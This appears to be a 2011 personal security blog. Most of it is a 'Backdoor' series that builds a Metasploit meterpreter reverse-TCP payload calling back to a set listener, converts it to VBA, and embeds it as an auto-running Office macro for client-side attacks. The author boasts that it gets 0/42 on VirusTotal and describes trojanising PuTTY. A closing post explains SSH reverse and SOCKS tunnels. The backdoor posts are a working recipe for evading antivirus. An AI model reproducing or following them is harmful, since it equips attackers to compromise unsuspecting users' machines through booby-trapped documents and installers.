Tuesday, May 24, 2011

(Backdoor Part 3)How to Convert *.EXE Payload into *.VBS Payload

This is the way on how I embedded it.

root@LM:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 R | ./msfencode -t exe -e x86/shikata_ga_nai X > payload.exe

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

root@LM:/opt/metasploit3/msf#

root@LM:/opt/metasploit3/msf3# mv payload.exe tools/

root@LM:/opt/metasploit3/msf3/tools# ruby exe2vba.rb payload.exe payload.vbs

[*] Converted 73802 bytes of EXE into a VBA script

#payload.vbs


Now open your MS WORD/EXECL and perform this following step.

In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor, if you’re using Word/Excel 2007, go to View Macros, then place a name like “lancit” and select “create”.

It's will pop-up a visual basic editor and paste the output of the payload.vbs and safe it.Put any word you in your actual word doc itself.The purpose is for the client-side-attack.

The Output is like this :

Sub Auto_open()
.
.
.
.
.
.
End Sub

Then you will get a nice undetectable antivirus backdoor.

Happy Trying...

(Backdoor Part 2)At last..Payload CANT BE DETECTED..!!

Why its cant be detected,where at first I encode it with *.exe then I manipulate it using ruby to be embedded inside *.vbs extension and below is the result from virus total.

File name:payload.vbs
Submission date:2011-05-23 17:32:43 (UTC)
Current status:finished
Result:0/ 42 (0.0%)

Additional information
MD5 : 8e54f3b36507c7c3f4a80ee336e367ae
SHA1 : ed8ba524a09494dcd7f86dbe5859339706264911
SHA256: 3ff926d2c6dfcee6443de3f0f0916a5ce1d1ccebe6f55399fcb8118758fc041d
ssdeep: 6144:kgwFOmxCAB1vR5CGikL/xz+fk+8yXRruNG63b/IjRuePX7k49TQ7rBlLRc3aT+ch:vwEmw
AvvR5CbS/9R+86RruNbLgduePXI
File size : 297145 bytes
First seen: 2011-05-23 17:32:43
Last seen : 2011-05-23 17:32:43
TrID:
Unknown!
sigcheck:
publisher....: n/a
copyright....: n/a
product......: n/a
description..: n/a
original name: n/a
internal name: n/a
file version.: n/a
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned

Monday, May 23, 2011

(Backdoor Part 1)Not A Successful Embedded PAYLOAD in Putty. But close Enough.. :D

Hi Guys,


Tonight I manage to embedded PAYLOAD inside putty and according to VirusTotal I manage to be detected (As Below Result).

File name:putty01.exe
Result:18/ 42 (42.9%)

The AV that detected are :

AntiVir 7.11.8.89 2011.05.21 TR/Crypt.XPACK.Gen
Avast 4.8.1351.0 2011.05.22 Win32:Vykuk
Avast5 5.0.677.0 2011.05.22 Win32:Vykuk
BitDefender 7.2 2011.05.22 Backdoor.Shell.AC
CAT-QuickHeal 11.00 2011.05.22 (Suspicious) - DNAScan
Commtouch 5.3.2.6 2011.05.22 W32/Swrort.D
Comodo 8797 2011.05.22 Heur.Corrupt.PE
DrWeb 5.0.2.03300 2011.05.22 Trojan.Packed.196
eSafe 7.0.17.0 2011.05.22 Suspicious File
F-Prot 4.6.2.117 2011.05.22 W32/Swrort.D
F-Secure 9.0.16440.0 2011.05.22 Backdoor.Shell.AC
GData 22 2011.05.22 Backdoor.Shell.AC
Microsoft 1.6903 2011.05.22 Trojan:Win32/Swrort.A
NOD32 6142 2011.05.22 a variant of Win32/Rozena.AG
Norman 6.07.07 2011.05.22 W32/Swrort.A
nProtect 2011-05-22.01 2011.05.22 Backdoor/W32.Shell.458752
Sophos 4.65.0 2011.05.22 Mal/Swrort-D
VIPRE 9357 2011.05.22 Trojan.Win32.Swrort.B (v)

As you can see the result from Microsoft Anti Malware ( I think ) :P its detected as a Trojan.

This Embedded Project is still in progress and will kept you updated if im not lazy enough -.-'

Opsss..Its late already..of to bed now..cheerio...

Monday, May 16, 2011

What is SSH and How to configure a SSH Reverse Tunnel

A simple Explanation of SSH.

Secure SHell
Connectivity tools for secure communications over the internet. SSH is a replacement for:telnet & rlogin.All communication is encrypted.

Purpose Common used of SSH:

1.You want to access a web interface that lies behind a firewall

2.You want to secure your communications when you are in a public WLAN


Step Take(By Problem)
=========

1.Problem: the server you want to access, can only be reached via VPN

Solution: create a reverse tunnel

Login to your server over your VPN

ssh -R 9995:localhost:22 your.ssh-server.net
if you are logged in on your.ssh-server.net you can now access the remote
server without vpn:
ssh -p 9995 localhost


2.Forward all your traffic through a tunnel

Connet to your server at first.

ssh -D 8888 your.ssh-server.net

Define a SOCKS-Proxy in your Browser settings with host '127.0.0.1' and port '8888'
Now all your traffic seems to come from that host!

Enjoy!